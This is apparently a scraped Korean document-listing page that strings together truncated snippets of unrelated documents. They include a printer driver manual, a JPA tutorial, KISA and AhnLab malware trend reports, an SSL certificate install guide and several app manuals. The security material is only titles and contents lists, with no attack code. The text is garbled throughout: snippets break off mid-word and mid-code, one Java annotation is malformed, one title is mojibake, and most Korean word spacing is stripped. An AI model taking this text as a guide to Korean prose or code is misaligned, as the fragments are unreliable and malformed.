소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423
More information@OneToOne(cascade = = "addr_id") private Addr addr; public Emp(String ename, Addr addr) { this.ename = ename; this.a
1 대 1 단방향, 주테이블에외래키실습 http://ojcedu.com, http://ojc.asia STS -> Spring Stater Project name : onetoone-1 SQL : JPA, MySQL 선택 http://ojc.asia/bbs/board.php?bo_table=lecspring&wr_id=524 ( 마리아 DB 설치는위 URL
More information월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부
월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜
안랩 온라인 보안 매거진 2016. 02 Mobile Security 월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜섬웨어의 모든 것 모바일까지
More information문서의 제목 나눔고딕B, 54pt
2015 개정교육과정 미래엔교사용 DVD 다운로드안내 문서버전 Ver 2.0 문서구분 가이드 최초작성일 2018.03.01 최종수정일 2019.01.30 이문서는나눔글꼴로작성되었습니다. 설치하기 목차 1-1. 최소필요용량 ---------------------------------------------- p.3~5 1-2. 파일다운로드 -----------------------------------------------
More information804NW±¹¹®
Copyright Samsung SDS All rights Reserved. 1 2 3 4 센트에서 빼낸 다음 삼성 S D S 고객센터 기사에게 연락합니다. 5 6 삼성 고객센터 기사에게 이지온 영상 전화기가 작동하는 상태에서 안전점검을 수행토록 요구해야 합니다 7 8 반드시 삼성 에서 승인된 부품만을 사용해야 합니다 삼성 에서 승인된 부품을 사용하지 않을
More information슬라이드 1
모바일소프트웨어프로젝트 지도 API 1 조 20070216 김성수 20070383 김혜준 20070965 이윤상 20071335 최진 1 매시업? 공개 API? 2 매시업 웹으로제공하고있는정보와서비스를융합하여새로운소프트웨어나서비스, 데이터베이스등을만드는것 < 최초의매시업 > 3 공개 API 누구나사용할수있도록공개된 API 지도, 검색등다양한서비스들에서제공 대표적인예
More informationPowerPoint Presentation
오에스아이소프트코리아세미나세미나 2012 Copyright Copyright 2012 OSIsoft, 2012 OSIsoft, LLC. LLC. PI Coresight and Mobility Presented by Daniel Kim REGIONAL 세미나 SEMINAR 세미나 2012 2012 2 Copyright Copyright 2012 OSIsoft,
More information[ 목차 ] 1. 개요 2 2. 악성앱배포방식 2 3. 채굴악성앱유형분석 정상앱을리패키징하여채굴기능포함후재배포 앱개발시의도적으로채굴기능포함 9 4. 스마트폰악성앱감염예방방법및대처 참고문헌 12 [ 붙임 ] 13
- 스마트폰을사용하지않거나충전중일때만악성행위 - 2014. 5 코드분석팀송지훤 jihwonsong@kisa.or.kr 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. [ 목차 ] 1. 개요 2 2. 악성앱배포방식 2 3. 채굴악성앱유형분석 3 3-1. 정상앱을리패키징하여채굴기능포함후재배포 3 3-2. 앱개발시의도적으로채굴기능포함
More information아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다
공유기사용환경에서 MNC-V100 환경설정하기 다음설명은 AnyGate GW-400A (Http://www.anygate.co.kr) 를사용하는네트워크환경에서 MNC-V100 을연결하여사용하는법을설명합니다. 공유기내부네트워크환경설정공유기를사용하는환경에서공유기의설정을아래그림과같이설정하시면 MNC-V100의설정을변경하지않아도모비캠과연결할수있습니다. ( 공유기의환경을변경하기어려운경우에는
More informationDDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS
DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.
More informationMicrosoft PowerPoint - 04-UDP Programming.ppt
Chapter 4. UDP Dongwon Jeong djeong@kunsan.ac.kr http://ist.kunsan.ac.kr/ Dept. of Informatics & Statistics 목차 UDP 1 1 UDP 개념 자바 UDP 프로그램작성 클라이언트와서버모두 DatagramSocket 클래스로생성 상호간통신은 DatagramPacket 클래스를이용하여
More informationCONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안
ASEC REPORT VOL.44 2013.08 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴
More informationPowerPoint 프레젠테이션
System Software Experiment 1 Lecture 5 - Array Spring 2019 Hwansoo Han (hhan@skku.edu) Advanced Research on Compilers and Systems, ARCS LAB Sungkyunkwan University http://arcs.skku.edu/ 1 배열 (Array) 동일한타입의데이터가여러개저장되어있는저장장소
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationⅠ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-
Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다. 2010 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 20 2010년 2월의악성코드감염보고는 Win32/Induc이
More informationB2B 매뉴얼
오디오북 모바일앱 사용자 매뉴얼 (안드로이드) 오디언 도서관 안드로이드용 - 오디오북 모바일앱은 안드로이드 OS 버전 2.1 이상을 지원합니다. (대표 기종 : 갤럭시 S, 갤럭시 S II, 갤럭시탭, 모토로이, 넥서스원 등) - OS 버전은 홖경설정(설정) > 휴대폰정보 > 펌웨어버전(Android 버전)에서 확인하실 수 있습니다.. - 하위 버전의 OS는
More information목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault
사용자매뉴얼 JetFlash Vault 100 ( 버전 1.0) 1 목차 1. 시스템요구사항... 3 2. 암호및힌트설정 ( 윈도우 )... 3 3. JetFlash Vault 시작하기 ( 윈도우 )... 7 4. JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 찾아보기... 10 JetFlash
More informationq 이장에서다룰내용 1 객체지향프로그래밍의이해 2 객체지향언어 : 자바 2
객체지향프로그래밍 IT CookBook, 자바로배우는쉬운자료구조 q 이장에서다룰내용 1 객체지향프로그래밍의이해 2 객체지향언어 : 자바 2 q 객체지향프로그래밍의이해 v 프로그래밍기법의발달 A 군의사업발전 1 단계 구조적프로그래밍방식 3 q 객체지향프로그래밍의이해 A 군의사업발전 2 단계 객체지향프로그래밍방식 4 q 객체지향프로그래밍의이해 v 객체란무엇인가
More informationAhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안철수연구
Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights reserved. ASEC REPORT VOL.23 211.12 안철수연구소월간보안보고서 이달의보안동향
More information..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A
..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * Amazon Web Services, Inc.. ID Microsoft Office 365*
More informationEndpoint Protector - Active Directory Deployment Guide
Version 1.0.0.1 Active Directory 배포가이드 I Endpoint Protector Active Directory Deployment Guide 목차 1. 소개...1 2. WMI 필터생성... 2 3. EPP 배포 GPO 생성... 9 4. 각각의 GPO 에해당하는 WMI 연결... 12 5.OU 에 GPO 연결... 14 6. 중요공지사항
More informationPowerPoint 프레젠테이션
Autodesk Software 개인용 ( 학생, 교사 ) 다운로드가이드 진동환 (donghwan.jin@autodesk.com) Manager Autodesk Education Program - Korea Autodesk Education Expert 프로그램 www.autodesk.com/educationexperts 교육전문가프로그램 글로벌한네트워크 /
More informationASEC Report VOL.61 January, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서
Security Trend ASEC Report VOL.61 January, 2015 ASEC Report VOL.61 January, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More information사용설명서를 읽기 전에 안드로이드(Android)용 아이디스 모바일은 네트워크 연결을 통해 안드로이드 플랫폼 기반의 모바일 기기에서 장치 (DVR, NVR, 네트워크 비디오 서버, 네트워크 카메라) 에 접속하여 원격으로 영상을 감시할 수 있는 프로그램입니다. 장치의 사
IDIS Mobile Android 사용설명서 Powered by 사용설명서를 읽기 전에 안드로이드(Android)용 아이디스 모바일은 네트워크 연결을 통해 안드로이드 플랫폼 기반의 모바일 기기에서 장치 (DVR, NVR, 네트워크 비디오 서버, 네트워크 카메라) 에 접속하여 원격으로 영상을 감시할 수 있는 프로그램입니다. 장치의 사양 및 버전에 따라 일부
More information어댑터뷰
04 커스텀어댑터뷰 (Custom Adapter View) 커스텀어댑터뷰 (Custom Adapter View) 커스텀어댑터뷰 (Custom Adatper View) 란? u 어댑터뷰의항목하나는단순한문자열이나이미지뿐만아니라, 임의의뷰가될수 있음 이미지뷰 u 커스텀어댑터뷰설정절차 1 2 항목을위한 XML 레이아웃정의 어댑터정의 3 어댑터를생성하고어댑터뷰객체에연결
More informationAhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 A
ASEC REPORT VOL.26 2012.03 안랩월간보안보고서 이달의보안동향 모바일악성코드이슈 악성코드분석특집 Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All
More information